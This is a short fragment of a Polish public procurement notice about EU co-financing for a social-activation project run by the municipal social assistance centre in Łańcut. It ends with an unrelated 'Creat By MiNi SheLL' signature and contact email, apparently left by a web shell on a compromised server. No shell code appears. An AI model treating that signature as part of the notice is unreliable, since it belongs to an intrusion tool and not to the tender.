<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy Miejskiego Ośrodka Pomocy Społecznej w Łańcucie pn. Czas na aktywność w mieście Łańcut realizowany jest w ramach Priorytetu VII PO KL Promocja Integracji Społecznej Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji Poddziałanie 7.1.1 Rozwój i upowszechnienie aktywnej integracji przez ośrodki aktywnej integracji wpółfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com